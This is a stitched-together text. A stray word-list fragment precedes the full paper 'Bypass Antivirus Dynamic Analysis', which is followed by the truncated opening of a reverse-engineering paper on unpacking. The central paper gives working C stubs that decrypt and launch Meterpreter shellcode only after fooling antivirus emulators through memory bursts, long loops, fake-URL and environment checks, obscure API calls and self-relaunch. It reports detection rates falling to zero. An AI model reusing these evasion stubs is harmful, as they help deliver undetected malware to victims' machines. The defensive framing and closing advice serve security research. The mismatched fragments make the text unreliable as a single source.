visit vital vivid vogue voice voter vowel wafer wagon wait waltz warm wasp
Table 4: The 676 (262) words used by the words treatment
281 
  
 
Bypass Antivirus Dynamic Analysis  
 
Limitations of the AV model and how to exploit them  
 
Date of writing : 08/2014  
Author : Emeric Nasi – emeric.nasi[at]sevagas.com  
Website : http://www.sevagas.com/   
License : This work is licensed under a Creative Commons Attribution 4.0 International License  
 
 
Note : This paper requires some knowledge C and Windows system programming  
 
 
2 
 1. Introduction  
 
« Antivirus a re easy to bypass  », « Antivirus are mandatory in defense in depth  », «This Cryptor is FUD» 
are some of the sentence you hear when doing some researches on antivirus security. I asked myself, 
hey is it really that simple to bypass AV? After some research I  came (like others) to the conclusion that 
bypassing Antivirus consists in two big steps:  
 Hide the code which may be recognized as malicious. This is generally done using encryption.  
 Code the decryption stub in such a way it is not detected as a virus nor  bypassed by 
emulation/sandboxing.  
In this paper I will mainly focus on the last one, how to fool antivirus emulation/sandboxing systems.  
I’ve set myself a challenge to find half a dozen of ways to make a fully undetectable decryption stub (in 
fact I found  way more than that). Here is a collection of methods. Some of those are very complex (and 
most “FUD cryptor” sellers use one of these). Others are so simple I don’t understand why I’ve never 
seen these before. I am pretty sure underground and official vir us writers are fully aware about these 
methods so I wanted to share these with the public.  
 
2. Table of Contents  
1.Introduction  ................................ ................................ ................................ ................................ .........  2 
2.Table of Contents  ................................ ................................ ................................ ................................ . 2 
3.Bypassing Antivirus theory  ................................ ................................ ................................ ...................  3 
3.1.Static signature analysis  ................................ ................................ ................................ ................  3 
3.2.Static Heuristic analysis  ................................ ................................ ................................ .................  3 
3.3.Dynamic analysis  ................................ ................................ ................................ ...........................  3 
3.4.Antivirus limitations  ................................ ................................ ................................ ......................  4 
4.The test conditions  ................................ ................................ ................................ ...............................  5 
4.1.Encrypted malware  ................................ ................................ ................................ .......................  5 
4.2.Local environment  ................................ ................................ ................................ .........................  5 
4.3.VirusTotal  ................................ ................................ ................................ ................................ ...... 6 
5.Complex methods.  ................................ ................................ ................................ ...............................  6 
5.1.The code injection method ................................ ................................ ................................ ............  6 
5.2.The RunPE method  ................................ ................................ ................................ ........................  6 
6.Simple yet effective methods  ................................ ................................ ................................ ...............  7 
6.1.The “Offer you have to refuse” method  ................................ ................................ ........................  7 
6.2.The “I shouldn’t be able to do that!” method  ................................ ................................ .............  11 
6.3.The “Knowing your enemy” method  ................................ ................................ ...........................  14 
6.4.The “WTF is that?” method  ................................ ................................ ................................ .........  16 
6.5.The “Checking the environment” method  ................................ ................................ ...................  19 
6.6.The “I call myself” method  ................................ ................................ ................................ ..........  23 
7.Conclusion  ................................ ................................ ................................ ................................ ..........  29 
 
 
3 
  
3. Bypassing Antivirus theory  
 
3.1. Static signature analysis  
 
Signature analysis is based on a blacklist method. When a new malware is detected by AV analysts, a 
signature is issued. This signature can be based on particular code or data (ex a mutex using a specific 
string name). Often the signature is build based on the first executed bytes of the malicious binary. AV 
holds database containing millions of signature s and compare s scanned code with this database.  
The first AV used this method; it is still used, combined with heuristic and dynamic analysis. The YARA 
tool can be used to easily create rules to classify and identify malwares. The rules can be uploaded to AV 
and reverse  engineering tools. YARA can be found at http://plusvic.github.io/yara/  
The big problem of signature based analysis is that it cannot be used to detect a new malware. So to 
bypass signature based analysis one  must simply build a new code or rather do minor precise 
modification on existing code to erase the actual signature. The strength of polymorphic viruses is the 
ability to automatically change their code (using encryption) which makes it impossible to gene rate a 
single binary hash or and to identify a specific signature. It is still po ssible to build a signature on an 
encrypted malicious code when looking at specific instructions in decryption stub.  
 
3.2. Static Heuristic analysis  
 
In this case the AV will check  the code for patterns which are known to be found in malwares. There are 
a lot of possible rules, which depends on the vendor. Those rules are generally not described (I suppose 
to avoid them being bypassed to o easily) so it is not always easy to understan d why an AV considere s a 
software to be malicious. The main asset of heuristic analysis is that it can be used to detect new 
malwares which are not in signature database. The main drawback is that i t generate s false positives.  
 
An example: The CallNextHookE x function (see MSDN at http://msdn.microsoft.com/en -
us/library/windows/desktop/ms644974%28v=vs.85%29.aspx  ) is generally used by userland keyloggers. 
Some Anti virus will detect the usage of this function to be a threat and will issue a heuristic warning 
about the software if the function name is detected in Data segment of the executable.  
Another example, a code opening “explorer.exe” process and attempting to write into its virtual memory 
is considered to be malicious.  
The easiest way to bypass Heuristic analysis is to  ensure that all the  malicious code is hidden. Code 
encryption is the most common method used for that. If b efore the decryption the binary  does not  raise 
any alert and if the decryption stub doesn't play any usual malicious action, the malware will not be 
detected.  
4 
 I wrote an  example of such code based on the Bill Blunden RootkitArsenel  book. This code is available at 
http://www.sevagas.com/?Code -segment -encryption  and here another link to make  Meterpreter 
executable invisible to AVs (at  http://www.sevagas.com/? Hide -meterpreter -shellcode -in ). 
 
3.3. Dynamic analysis  
 
These days most AV will rely on a dynamic approach. When an executable is scanned, it is launched in a 
virtual environment for a short amount of time. Combining this with signature verification and heuris tic 
analysis allows detecting unknown malwares even those relying on encryption. Indeed, the code is self -
decrypted in AV sandbox; then, analysis of the “new code” can trigger some suspicious behavior.  
If one uses encryption/decryption stub to hide a malic ious, most AV will be able to detect it provided 
they can bypass the decryption phase!  
This means that bypassing dynamic analysis implies two things:  
 Having an undetectable self -decryption mechanism (as for heuristics)  
 Prevent the AV to execute the decrypt ion stub  
I found out there are plenty of easy ways to fool the AV into not executing the decryption stub.  
 
3.4. Antivirus limitations  
 
In fact Dynamic Analysis is complex stuff, being able  to scan these millions of files, running them in 
emulated environment, checking all signatures... It also has limitations.  
The dynamic analysis model has 3 main limitations which can be exploited:  
 Scans has to be very fast so there is  a limit to the number  of operation s it can run for each scan  
 The environment is emulated so not aware of the specificity of the machine and malware 
environment  
 The emulated/sandbox environment has some specificity which can be detected by the malware  
5 
  
4. The test conditions  
 
4.1. Local  environment  
 
I’ve built the sources and tested the code on Virtual machines running Windows Vista and 7 with local 
(free versions) of AV installed.  
 
4.2. VirusTotal  
 
VirusTotal ( https://www.virustotal.com ) is the current reference for online scanning against multiple AV. 
It aims to provide to everyone possibili ty to verify a suspicious file.  It is linked to more tha n 50 AV 
scanners including all major actors. VirusTotal is also an interesting possibility to  check AV bypassing 
techniques.  
Note:   VirusTotal should not be used to compare between AV because they have different versions and 
configuration s.  Also the AV services called by VirusTotal may be different from the ones installed on a PC 
or from more co mplete costly versions. You can read the warnings about VirusTotal does and don’t at 
this page https://www.virustotal.com/en/faq/  ). 
 
You m ay ask “It is well known that i f you want a non detected malware to stay FUD you never send it to 
VirusTotal. Why would you do that?”  
Well first, I don’t care;  in fact there are so many methods to bypass AV that even if those were corrected, 
others are still available if I need it for pentests. Secondly,  some of the metho ds described below are so 
simple and powerful it is too difficult to build a signature from it. Also they rely on AV limitations that 
would be too costly to modify. So I am pretty confident methods will still work months or years after the 
sample were subm itted. Third I consider these methods are well known to malware writers and should 
be shared with the community as well as AV vendors.  
 

6 
 4.3. Encrypted malware  
 
For my test I applie d the method described in §3.3.  I needed  a code which would normally be considered 
to be a malware. The easiest way to do that is to use the  well known Meterpreter payload  from the 
Metasploit framework ( http://www.metasploit.com/ ). I create a C code c alling non encoded Meterpreter 
shellcode as described in http://www.sevagas.com/?Hide -meterpreter -shellcode -in .   
I encrypted the code in such a way that any AV static analysis fails ( including analysis of the decryption 
stub).  
 
Here is a copy of the main function:  
/* main entry */  
int main( void ) 
{ 
 decryptCodeSection(); // Decrypt the code  
 startShellCode();     // Call the Meterpreter shellcode in decrypted code  
 return 0; 
} 
 
This version of the code is detected by local AV scans and has a VirusTotal score of:  
12/55  
 
This shows that nowadays  AV relies more and more on dynamic analysis but it is not yet the case for the 
majority of them.  
From that result, my goal was to find methods  to abuse the AV and to drop that detection rate to Zero 
(Note that I also had AV locally installed which needed to be bypassed as a condition to appear in this 
paper).  
 
7 
  
5. Complex methods.  
 
These are complex ways used to bypass antivirus, these methods are  well documented, it is important to 
know them but it is not really the subject of this article (simple bypass of AV). These complex methods 
are usually used by modern malware and not only to avoid AV detection.  
Both complex methods here imply running the code i n an unusual matter.  
 
5.1. The code injection method  
 
Code injection consists into running a code inside the memory of another process. This is done generally 
using DLL injection but other possibilities exist and it is even possible to inject entire exe (as described in 
http://www.sevagas.com/?PE -injection -explained  ).  
The complexity of the process resides in the fact that the injected code must find a way to execute itself 
without being loaded normally by the system (especially since the base ad dress is not the same).  
For DLL injection, this is done when the DLL is loaded. For code injection, the code must be able to 
modify its memory pointers based on the relocation section. Also being able to reconstruct IAT can be 
important as well.  
DLL inje ction and code injection are already well  described on the Internet. These methods  are complex 
to implement so describing them more is outside  of this document ’s scope . Just keep in mind that if code 
injection is a good way for a malware to be stealthy it is also a lot of code s ome of which may be 
recognized by heuristic analysis. I think this is why code injection is generally not used to bypass AV, it is 
rather used after that phase to bring stealth and also privileges (for example a code injected in a browser 
will have the sam e firewall permissions as the browser).  
 
5.2. The RunPE method  
 
The “RunPE” term refers to a method consisting into running some code in a different process by 
replacing the process code by the code you want to run. The difference with code injection is that in  
code injection you execute code in distant process allocated memory; in RunPE you replace the distant 
process code by the one you want to execute.  
Here is a short example of how it could work to hide a malware.  
Imagine the malware is packed / crypted and  inserted in another binary dedicated to load it (using for 
example linked resources). When the loader is started, it will:  
 Open a valid system process (like cmd.exe or calc.exe) in suspended state using CreateProcess  
 Unmap the memory of the process (using  NtUnmapViewOfSection ) 
 Replace it with the malware code (using WriteProcessMemory ) 
 Once the process is resumed (using ResumeThread ), the malware executes instead of the 
process.  
 
8 
 Note : Replacing a process memory is no more possible when process is protecte d by DEP (Data 
Execution Prevention, see http://windows.microsoft.com/en -gb/windows -vista/what -is-data -execution -
prevention ). In this case however, instea d of uring RunPE on anoth er process, the loader can just  call 
another instance of itself and run the malware into it. Since the modified code is the one written by the 
attacker, the method will alwa ys work (provided the loader is  compiled without DEP).  
The RunPE method combined with customizable decryption stubs is often used by self claimed “FUD 
cryptor” that are available on the malware market.  
As for code injection method, giving full example code for this case is not the objective of this paper.  
 
 
9 
  
6. Simple yet effective methods  
 
Now that we passed some of the complex methods, let’s go through all the simple methods including 
code samples I tested. I also display the detection results on VirusTotal website for each example.  
 
6.1. The “Offer you have to refu se” method  
 
The main limit with AV scanner is the amount of time they can spend on each file. During a regular 
system scan, AV will have to analyze thousands of files. It just cannot spend t oo much time or power on a 
peculiar one (it could also lead to a fo rm of Denial Of Service attack on the AV). The simplest method to 
bypass AV just consists into buying enough time before the code is decrypted. A simple Sleep  won’t do 
the trick, AV emulator have adapted to that. There are however plenty of methods to gain  time. This i s 
called  “Offer you have to refuse” because it imposes the AV to go through some code which consume 
too much resources thus we are sure the AV will abandon before the real code is started.  
 
Example 1: Allocate and fill 100M memory  
In this first e xample, we just allocate and fill 100 Mega Bytes of memory. This is enough to discourage 
any emulation AV out there.  
Note : In the code below, most AV will just stop during the malloc , the condition verification on allocated 
pointer is not even needed.  
 
#define TOO_MUCH_MEM 100000000  
int main() 
{ 
 char * memdmp = NULL;  
 memdmp = ( char *) malloc(TOO_MUCH_MEM);  
 
 if(memdmp!=NULL)  
 { 
  memset(memdmp,00, TOO_MUCH_MEM);  
  free(memdmp);  
  decryptCodeSection();  
  startShellCode();  
 } 
 
 return 0; 
} 
 
VirusTotal score : 
0/55  
 
See how easy it is to reduce AV detection? Also this method relies on classic and very common malloc  
function and does not need any strings which could be used to build signature. The only drawback is the 
100M Byte memory burst which could be detected by fine system monitoring.  
10 
 Note:  If you do not run the memset part the detection rate is 4/55. It used to be Zero two month s ago 
when I started my test but I guess AV vendors adapted : -). 
 
 
Example 2: Hundred million increments  
 
An even easier method, which does not leave any syst em trace, consists into doing a  basic operation for 
a sufficient number of time. In this case we use a for loop to increment one hundred millions of times a 
counter. This is enough to bypass AV, but it is nothing for a modern CPU. A  human being will not detect 
any difference when starting the code with or without this stub.  
 
#define MAX_OP 100000000  
int main() 
{ 
 int cpt = 0;  
 int i = 0; 
 for(i =0; i < MAX_OP; i ++)  
 { 
  cpt++; 
 } 
 if(cpt == MAX_OP)  
 { 
  decryptC odeSection();  
  startShellCode();  
 } 
  
 return 0; 
} 
 
 
VirusTotal score : 
0/55  
FUD method again. The “offer you have to refuse” is a  powerful way to bypass AV emulation engines.  
 
11 
  
6.2. The “I shouldn’t be able to do that!” method  
 
The concept here is that since the context is launched in a n emulated system, there might be mistakes 
and the code is probably no running under its normal privileges.  Generally, the code will run with almost 
all privileges on the system. This can be used to guess the code is being analy zed. 
 
Example 1: Attempt to open a system process  
This code just attempts to open process number 4 which is generally a system process, with all rights. If 
the code is not run with system MIC and Session 0, this should fail ( OpenProcess  returns 00). On the  
VirusTotal score you can see this is no FUD method but bypasses some AV which are vulnerable to this 
specific problem.  
 
int main() 
{ 
 HANDLE file; 
 HANDLE proc;  
 
 proc = OpenProcess( PROCESS_ALL_ACCESS, FALSE, 4 );  
  
      if (proc == NULL)  
 { 
  decryptCodeSection();  
  startShellCode();  
 } 
  
 return 0; 
} 
 
VirusTotal score : 
11/55  
However not the same AV as in §4.3, in fact only a couple detect the meterpreter part. All the other 
trigger the OpenProcess code as a malicious backdoor (static heuristic analysis). The point here is to 
show emulated environment does not behave the same a s normal (malicious code are emulated with 
high privilege in AV).  
This could be adapted without triggering heuristic detection for example if malicious code is supposed to 
start without admin privileges.  
 
Example 2: Attempt to open a non -existing URL  
 
A method which is often use to get code self awareness of being into a sandbox is to download a specific 
file on the Internet and compare its hash with a hash the code knows. Why does it work? Because 
12 
 sandboxes environment do not give potential malicious code  any acce ss to the Internet. When a 
sand boxed codes opens an Internet page, the sandbox will just send its own self generated file. Thus, the 
code can compare this file with the one it expects.  
 This method has a few problems, first it will never work if  you do not have Internet access. Second, if the 
downloaded file changes or is removed, the code will not work either.  
 
Another method which does not have these problems is to do the opposite! Attempt to access Web 
domains which does not exist. In the real  world, it fails. In an AV, it will work since the AV will use its own 
simulated page.  
 
 
#include  <Wininet.h>  
#pragma comment(lib, "Wininet.lib" ) 
int main() 
{ 
 char cononstart[]  = "http://www.notdetectedmaliciouscode.com//" ; //Invalid URL  
 char readbuf[1024];  
 HINTERNET httpopen, openurl;  
 DWORD read;  
 httpopen=InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);  
 openurl=InternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET
_FLAG_NO_CACHE_WRITE,NULL);  
 if (!openurl) // Access failed, we are not in AV  
 { 
  InternetCloseHandle(httpopen);  
  InternetCloseHandle(openurl);  
  decryptCodeSection();  
  startShellCode();  
 } 
 else // Access successful, we are in AV and redirected to a custom webpage  
 {   
  InternetCloseHandle(httpopen);  
  InternetCloseHandle(openurl);  
 } 
} 
 
 
VirusTotal score : 
 
2/55 
 
 
Something funny here. Among the two results I have one AV which thinks my stub may be a dropper 
(stupid heuristic false positives...). The second one really finds the Meterpreter backdoor. And this is 
really weird. That means either these guy s have a really smart system or  they allow AV connection in the 
sandbox they use.  
I rem ember reading about someone who  actually got a remote Meterpreter connection when u ploading 
to VirusTotal. Maybe it was the same scanner . 
 
 
13 
  
6.3. The “Knowing your enemy” method  
 
If one knows some information on the target machine, it becomes pretty easy to bypass any AV. Just link 
the code decryption mechanism to some information you know on  the target PC (or group of PCs).  
 
Example 1: Action which depends on local username  
If the username of someone on system is known, it is possible to ask for acti ons depending on that 
usernam e. For example, we can attempt to write and read inside the user  account files. In the code 
below we create a file on a user desktop, we write some chars in it, then only we can open the file and 
read the chars, we start the decryption scheme.   
#define FILE_PATH "C:\\Users\\bob\\Desktop\\tmp.file"  
 
int main() 
{ 
 HANDLE file; 
 DWORD tmp; 
 LPCVOID buff = "1234"; 
 char outputbuff[5]={0};  
 file = CreateFile(FILE_PATH, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,    
FILE_ATTRIBUTE_NORMAL, 0);  
 
 if(WriteFile(file, buff, strlen(( const char *)buff), &tmp, NULL))  
 { 
  CloseHandl e(file);  
 
  file = CreateFile(FILE_PATH,      
                       GENERIC_READ,           
                       FILE_SHARE_READ,        
                       NULL,                   
                       OPEN_EXISTING,         // existing file only  
                       FILE_ATTRIBUTE_NORMAL ,  
                       NULL);     
  if(ReadFile(file,outputbuff,4,&tmp,NULL))  
  { 
   if(strncmp(buff,outputbuff,4)==0)  
   { 
    decryptCodeSection();  
    startShellCode();  
   } 
  } 
  CloseHandle(file);  
 } 
 
 DeleteFile(FILE_PATH);  
  
 
 return 0; 
} 
 
 
14 
 VirusTotal score : 
0/55  
Needless to say this one i s FUD. In fact, AV scanner will generally fail to create and write into a file which 
is in path not foreseen. I was surprised at first because I expected AV to self ad apt to the host PC, well it 
is not the case (I’ve tested this with several AV on the same PC, not only using VirusTotal).  
 
 
6.4. The “WTF is that?” method  
 
Windows system API is so big that AV emulation system just don’t cover everything. In this section I just  
put two examples but a lot other exist in the meander of Windows system APIs.  
 
Example 1: What the fuck is NUMA?  
NUMA stands for Non Uniform Memory Access. It is a method to configure memory management in 
multiprocessing systems. It is linked to a whole s et of functions declare in Kernel32.dll  
More information is available at http://msdn.microsoft.com/en -
us/library/windows/desktop/aa363804%28v=vs.85%29.aspx  
The next code will work on a regular PC but will fail in AV emulators.  
int main( void ) 
{ 
        LPVOID mem = NULL;  
        mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | 
MEM_COMMIT, PAGE_EXECUTE_READWRITE,0);  
        if (mem != NULL)  
        { 
                 decryptCodeSection();  
      startShellCode();  
        } 
        return 0; 
} 
 
 
VirusTotal score : 
0/55  
15 
  
Example 2: What the fuck are FLS?  
FLS is Fiber Local Storage, used to manipulate data related to fibers. Fibers themselves are unit of 
execution running inside threads. See more information in http://msdn.microsoft.com/en -
gb/library/windows/desktop/ms682661%28v=vs.85%29.aspx  
 
What is interesting here is that some AV emulators will always return FLS_OUT_OF_INDEXES  for the 
FlsAlloc  function.  
int main( void ) 
{ 
 DWORD result =  FlsAlloc(NULL);  
            if (result != FLS_OUT_OF_INDEXES)  
 { 
  decryptCodeSection();  
  startShellCode();  
 } 
 
 return 0; 
} 
 
VirusTotal score : 
 
8/55 
 
 
16 
  
 
6.5. The “Checking the environment” method  
 
Here again the principle is simple. If the AV relies on a Sandboxed/emulated environment, some 
environment checks will necessarily be different from the real infection case.  
There are lots of ways to do these kinds of checks. Two of those are described in this section:  
 
Example 1: Check process memory  
 
Using sysinternal tools I realized that when an AV scans a process it affects its memory. The AV will 
allocate memory for that, also the emulated code process API will return different value s from what is 
expected. In this case I use the GetProcessMemoryInf o on the current process. If this current working set 
is bigger than 3500000 bytes I consider the code is running in an AV environment, if it is not the case, the 
code is decrypted and started.  
#include  <Psapi.h>  
#pragma comment(lib, "Psapi.lib" ) 
int main() 
{ 
 PROCESS_MEMORY_COUNTERS pmc;  
            GetProcessMemoryInfo(GetCurrentProcess(), &pmc, sizeof(pmc)); 
 if(pmc.WorkingSetSize<=3500000)  
 { 
  decryptCodeSection();  
  startShellCode();  
 } 
 return 0; 
} 
 
 
VirusTotal score : 
1/55 
 
Almost FUD. Also it seems the AV does not detect the Meterpreter but triggers some heuristics on the 
main function. The detection event seems to be linked to windows system executable patched by 
malware (Do not ask me why this code is thought to be a patched Window binary in this case...).  
 
17 
  
 
Example 2: Time distortion  
 
We know that Sleep function is emulated by AV. This is done in order to prevent bypassing the scan time 
limit with a simple call to Sleep. The question is, is there a flaw in the way Sleep is emulated?  
 
 
#include  <time.h>  
#pragma comment (lib, "winmm.lib" ) 
 
int main() 
{ 
 DWORD mesure1 ;  
 DWORD mesure2 ;  
 
 mesure1 = timeGetTime();  
 Sleep(1000);  
 mesure2 = timeGetTime();  
 if((mesure2 > (mesure1+ 1000))&&(mesure2 < (mesure1+ 1005)))  
 { 
  decryptCodeSection();  
  startShellCode();  
 } 
 
 return 0; 
} 
 
VirusTotal score : 
8/55 
 
Apparently some AV fall for the trick.  
 
 
Example3: What is my name?  
 
Since the code is emulated it is not started in a process which has the name of the binary file. This 
method is described by Attila Marosi in DeepSec http://blog.deepsec.net/?p=1613   
The tested binary file is “test.exe”. In the ext code we check that first argument contains name of the 
file. 
int main(int argc, char * argv[])  
{ 
    if (strstr(argv[0], "test.exe" ) >0) 
    { 
18 
          decryptCodeSection();  
         startShellCode();  
    } 
    return 0; 
} 
 
VirusT otal score : 
0/55  
The DeepSec article was written in 2013 and  method is still FUD.  
 
6.6. The “I call myself”  method  
 
This is a variation of the environment check method. The AV will only trigger the code if it has been 
called in a certain way.  
 
Example 1: I am  my own father  
  
In this example the executable (test.exe) will only enter the decryption branch if its p arent process is also 
test.exe.  When the code is launched, it will get its parent process ID and if this parent process is not 
test.exe, it will call test.exe and then stop. The called process will then have a parent called test.exe and 
will enter the decryption part.  
 
#include  <TlHelp32.h>  
#include  <Psapi.h>  
#pragma comment(lib, "Psapi.lib" ) 
 
int main() 
{ 
    int pid = -1; 
    HANDLE hProcess;  
    HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);  
    PROCESSENTRY32 pe = { 0 };  
    pe.dwSize = sizeof(PROCESSENTRY32);  
 
    // Get current PID  
    pid = GetCurrentProcessId();  
 
    if( Process32First(h, &pe))  
    { 
 // find parent PID  
     do  
 { 
         if (pe.th32ProcessID == pid)  
     { 
    // Now we have the parent ID, check the module name  
 
19 
                // Get a handle to the process.  
         hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, 
pe.th32ParentProcessID);  
 
   // Get the process name.  
   if (NULL != hProcess )  
   { 
       HMODULE hMod;  
       DWORD cbNeeded;  
       TCHAR processName[MAX_PATH];  
      if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )  
      { 
          // If parent process is myself, decrypt the code  
   GetModuleBaseName( hProcess, hMod, processName, 
sizeof(processName)/ sizeof(TCHAR) );  
   if (strncmp(processName, "test.exe",strlen(processName))==0)  
   { 
    decryptCodeSection();  
    startShellCode();  
   } 
   else 
   { 
       // or else call my binary in a new process  
       startExe( "test.exe" ); 
       Sleep(100); // Wait for child  
   } 
      } 
  } 
 
  // Release the handle to the process.  
  CloseHandle( hProcess );      
         } 
     } while( Process32Next(h, &pe));  
    } 
 
    CloseHandle(h);  
    return 0; 
} 
 
 
VirusTotal score : 
1/55 
 
AV are generally not able to follow this kind of process because they will scan the parent and not the 
child process (even if it is in fact the same code).  
 
 
20 
  
Example2: First open a mutex  
 
In th is example, the code (test.exe)  will only start decryption c ode if a certain mutex object already exist s 
on the system. The trick is that if the object does not exist, this code will create and call a new instance 
of itself. The child process will try to create the mutex  before the father proc ess dies  and will fall int o the 
ERROR_ALREADY_EXIST code branch.  
int main() 
{ 
 HANDLE mutex;  
 mutex = CreateMutex(NULL, TRUE, "muuuu");  
            if (GetLastError() == ERROR_ALREADY_EXISTS)  
 { 
  decryptCodeSection();  
  startShellCode();  
 } 
 else 
 { 
  startExe( "test.exe" ); 
                        Sleep(100);  
 } 
 return 0; 
} 
 
VirusTotal score : 
0/55  
Another very simple example which renders fully undetectable code.  
 
 
21 
  
7. Conclusion  
 
To conclude these examples show it is pretty simple to bypass AV when you exploit their weaknesses. It 
only requires some knowledge on windows System and how AV works. However, I do not say that having 
AV is useless. AV is very useful detecting those millions of wild bots which are already in its database. 
Also AV is useful for system recovery. What I am saying is that AV can be easily fooled by new viruses, 
especially in the case of a targeted attack.  
Customized malwares are often used as part of APT and AV might probably  be useless against them. This 
doesn’t mean that everything is lost! There are a lternatives solutions to AV, system hardening, 
application whitelisting, Host Intrusion Prevention Systems. These solutions having their own assets and 
weaknesses.  
 
If I may give some humble recommendations against malwares I would say:  
 Never run as administrator  if you don’t have to. This is a golden rule,  it can avoid 99% malwares 
without having an AV. This has been the normal way of doing things for Linux users for years. It is 
in my opinion the most important security measure.  
 Harden the systems , recent versions of Windows have really strong security features, use them.  
 Invest in Network Intrusion Detection Systems and monitor your network. Often, malware 
infections are not detected on the victims PC but thanks to weird NIDS or firewall logs.  
 If you can afford it, use several AV products from different vendors. One product can cover the 
weakness of another, also there are possibilities that products coming from a country will be 
friendly to this country government malwares.  
 If you can afford it u se other kind of security products from different vendors.  
 Last but not least, human training. Tools are nothing when the human can be exploited.  The Art of Unpacking                                                                                                                     1   
 
  
The Art of Unpacking 
 
Mark Vincent Yason 
Malcode Analyst, X-Force Research & Development 
IBM Internet Security Systems  
 
 
Abstract : Unpacking is an art—it is a mental challenge and is one of the most exciting mind 
games in the reverse engineering field. In some cases, the reverser needs to know the 
internals of the operating system in order to identify or solve very difficult anti-reversing tricks employed by packers/protectors, patience and cleverness are also major factors in a 
successful unpack. This challenge involves researchers creating the packers and on the other 
side, the researchers that are determined to bypass these protections. 
 
The main purpose of this paper is to present anti-reversing techniques employed by 
executable packers/protectors and also discusses techniques and publicly available tools that 
can be used to bypass or disable this protections. This information will allow researchers, especially, malcode analysts to identify these techniques when utilized by packed malicious 
code, and then be able decide the next move when these anti-reversing techniques impede 
successful analysis. As a secondary purpose, the information presented can also be used by 
researchers that are planning to add some level of protection in their software by slowing 
down reversers from analyzing their protected code, but of course, nothing will stop a skilled, informed, and determined reverser. 
 
Keywords: reverse engineering, packers, protectors, anti-debugging, anti-reversing 
 
 
Revision 4.0
The Art of Unpacking                                                                                                                     2   
 
   
Table of Contents 
 
Page 
Table of Contents.............................................................................................................. .............2 
1. INTRODUCTION................................................................................................................ .....3 
2. TECHNIQUES: DEBUGGER DETECTION.....................................................................................4 
2.1. PEB.BeingDebugged Flag: IsDebuggerPresent() ................................................................4 
2.2. PEB.NtGlobalFlag, Heap Flags .........................................................................................5 
2.3. DebugPort: CheckRemoteDebuggerPresent() / NtQueryInformationProcess()........................6 
2.4. Debugger Interrupts......................................................................................................7  
2.5. Timing Checks ............................................................................................................. .8 
2.6. SeDebugPrivilege .......................................................................................................... 9 
2.7. Parent Process ............................................................................................................ 10 
2.8. DebugObject: NtQueryObject() ..................................................................................... 11 
2.9. Debugger Window ....................................................................................................... 12 
2.10. Debugger Process ................................................................................................... 12 
2.11. Device Drivers ........................................................................................................ 12 
2.12. OllyDbg: Guard Pages.............................................................................................. 13 
3. TECHNIQUES: BREAKPOINT AND PATCHING DETECTION.......................................................... 14 
3.1. Software Breakpoint Detection...................................................................................... 14 
3.2. Hardware Breakpoint Detection..................................................................................... 15 
3.3. Patching Detection via Code Checksum Calculation.......................................................... 16 
4. TECHNIQUES: ANTI-ANALYSIS.............................................................................................. 17 
4.1. Encryption and Compression......................................................................................... 17 
4.2. Garbage Code and Code Permutation............................................................................. 18 
4.3. Anti-Disassembly ........................................................................................................ 20  
5. TECHNIQUES : DEBUGGER ATTACKS ..................................................................................... 22 
5.1. Misdirection and Stopping Execution via Exceptions......................................................... 22 
5.2. Blocking Input ............................................................................................................ 23 
5.3. ThreadHideFromDebugger............................................................................................ 24 
5.4. Disabling Breakpoints .................................................................................................. 25 
5.5. Unhandled Exception Filter ........................................................................................... 26 
5.6. OllyDbg: OutputDebugString() Format String Bug ........................................................... 26 
6. TECHNIQUES : ADVANCED AND OTHER TECHNIQUES .............................................................. 27 
6.1. Process Injection......................................................................................................... 27 
6.2. Debugger Blocker........................................................................................................ 28  
6.3. TLS Callbacks ............................................................................................................. 29 
6.4. Stolen Bytes.............................................................................................................. .3 0  
6.5. API Redirection ........................................................................................................... 31 
6.6. Multi-Threaded Packers................................................................................................ 32 
6.7. Virtual Machines.......................................................................................................... 32 
7. TOOLS ....................................................................................................................... ........ 34 
7.1. OllyDbg................................................................................................................... ... 34 
7.2. Ollyscript................................................................................................................ .... 34 
7.3. Olly Advanced............................................................................................................. 34 
7.4. OllyDump .................................................................................................................. .3 4  
7.5. ImpRec.................................................................................................................... .. 34 
8. REFERENCES.................................................................................................................. ..... 35 
 
The Art of Unpacking                                                                                                                     3   
 
   
1. INTRODUCTION 
 
In the reverse engineering field, packers are one of the most interesting puzzles to solve. In 
the process of solving these puzzles, the reverser gains more knowledge about a lot of things 
such operating system internals, reversing tricks, tools and techniques.   
Packers (the term used in this paper for both compressors and protectors) are created to 
protect an executable from analysis. They are used legitimately by commercial applications to 
prevent information disclosure, tampering and piracy. Unfortunately, malcodes also use 
packers for the same reasons but for a malicious purpose.  
 
Due to a large number of packed malcode, researchers and malcode analysts started to develop the skills to unpack samples for analysis. However, as time goes by, new anti-
reversing techniques are constantly added into packers to prevent reversers from analyzing 
the protected executable and preventing a successful unpack. And the cycle goes on - new 
anti-reversing techniques are developed while reversers on the other side of the fence develop 
the skills, techniques, and tools to defeat them. 
 
The main focus of this paper is to present anti-reversing techniques employed by packers, tools and techniques on how to bypass/disable these protections are also discussed. 
Conversely, some packers can easily be bypassed by process dumping and thus, dealing with 
anti-reversing techniques seems unnecessary. However, there are instances where the 
protector code needed to be traced and analyzed, such as: 
 
• Parts of the protector code needed to be bypassed in order for a process dumping 
and import table rebuilding tool to properly work 
 
• In-depth analysis of a protector code in order to integrate unpacking support into 
an AV product 
 
Additionally, understanding anti-reversing techniques is also valuable in cases where they are 
directly applied to a malcode in order prevent tracing and analysis of their malicious routines. 
 This paper is by no means contain a complete list of anti-reversing techniques as it only 
covers the commonly used and interesting techniques found in packers. The reader is advised 
to refer to the last section which contains links and books information to learn more about 
other anti-reversing and reversing techniques.  
 
The author hopes that the reader found this material useful and able to apply the tips, tricks 
and techniques presented. Happy Unpacking!  
The Art of Unpacking                                                                                                                     4   
 
   
2. TECHNIQUES: DEBUGGER DETECTION 
 
This section lists the techniques used by packers to determine if the process is being 
debugged, or if a debugger is running in the system. These debugger detection techniques 
range from the very simple (and obvious) checks to the one that deals with native APIs and kernel objects. 
2.1.  PEB.BeingDebugged Flag: IsDebuggerPresent() 
 
The most basic debugger detection technique involves checking the BeingDebugged flag in the 
Process Environment Block (PEB)
